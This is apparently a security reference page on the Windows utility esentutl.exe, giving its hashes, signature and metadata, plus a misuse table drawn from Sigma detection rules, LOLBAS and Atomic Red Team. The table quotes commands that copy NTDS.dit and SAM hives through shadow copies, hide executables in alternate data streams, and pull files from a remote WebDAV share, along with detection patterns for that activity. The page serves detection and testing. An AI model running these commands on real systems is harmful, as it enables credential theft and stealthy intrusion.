esentutl.exe

  • File Path: C:\WINDOWS\system32\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type Hash
MD5 A9DF466F89B546452C955C6DFC91BF0F
SHA1 84D6F989C265677627306E01E5A2525E39B176B1
SHA256 8A0BF768502C8006CEAC62E3F1564E6893595170A4601E89B0F67C574EC98C41
SHA384 684C7717C1F1FF5989624EA6484B186504EDA516C4DF5858BD90BEDB2683544D592B1DDE402642B1A11F7ABAE670FB87
SHA512 D06F51729AD8C6D00026D27B097F47E1A4A1217CD791819D6AC5F53CDCD6F4EFD260E4F08376E160F5801A0951E23C6BF75798344101B58310D273396F6D9A64
SSDEEP 6144:URFVN/CkAAS4KaXa1CBY6Vet2DtIiuAq5M9V9uoLDG0BSGJMXjAd:URFe7mjNBSLSluoG0AjA

Runtime Data

Child Processes:

conhost.exe

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\esentutl.exe' DRL 1.0
sigma win_susp_esentutl_activity.yml title: Suspicious Esentutl Use DRL 1.0
sigma win_susp_esentutl_activity.yml description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\ntds.dit* DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SAM DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SYSTEM DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'esentutl ' DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - Image\|endswith: '\esentutl.exe' DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml title: Esentutl Steals Browser Information DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml Image\|endswith: \esentutl.exe DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml title: Esentutl Gather Credentials DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml - 'esentutl' DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml title: Esentutl Volume Shadow Copy Service Keys DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter DRL 1.0
LOLBAS Esentutl.yml Name: Esentutl.exe  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit  
LOLBAS Esentutl.yml - Path: C:\Windows\System32\esentutl.exe  
LOLBAS Esentutl.yml - Path: C:\Windows\SysWOW64\esentutl.exe  
LOLBAS Esentutl.yml - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/  
atomic-red-team index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md - Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ## Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md Copy the SAM hive using the esentutl.exe utility MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.